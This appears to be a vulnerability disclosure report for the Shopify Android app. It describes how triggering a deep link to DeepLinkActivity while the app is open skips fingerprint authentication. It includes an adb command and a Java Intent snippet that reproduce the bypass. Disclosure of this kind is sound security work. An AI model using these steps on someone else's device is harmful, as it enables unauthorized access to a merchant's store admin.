Summary

Shopify Android App has an option to sign in to the app using fingerprint. But if the application was open and someone triggers a “deeplink”, authentication is no longer required.

Step to Reproduce

{F523700}
Link: Shopify Help Center - Topics - Products

NOTE¹: The application must be open when triggered com.shopify.mobile.lib.app.DeepLinkActivity.
NOTE²: It is also possible via ADB and Java (Android App):
adb shell am start -n com.shopify.mobile/com.shopify.mobile.lib.app.DeepLinkActivity -d 'https://www.shopify.com/admin/products'

Intent intent = new Intent();
intent.setClassName("com.shopify.mobile", "com.shopify.mobile.lib.app.DeepLinkActivity");
intent.setData(Uri.parse("https://www.shopify.com/admin/products")); 
startActivity(intent);

My environment information:
{F523698} {F523699}

Impact

Unauthorized access to use the application.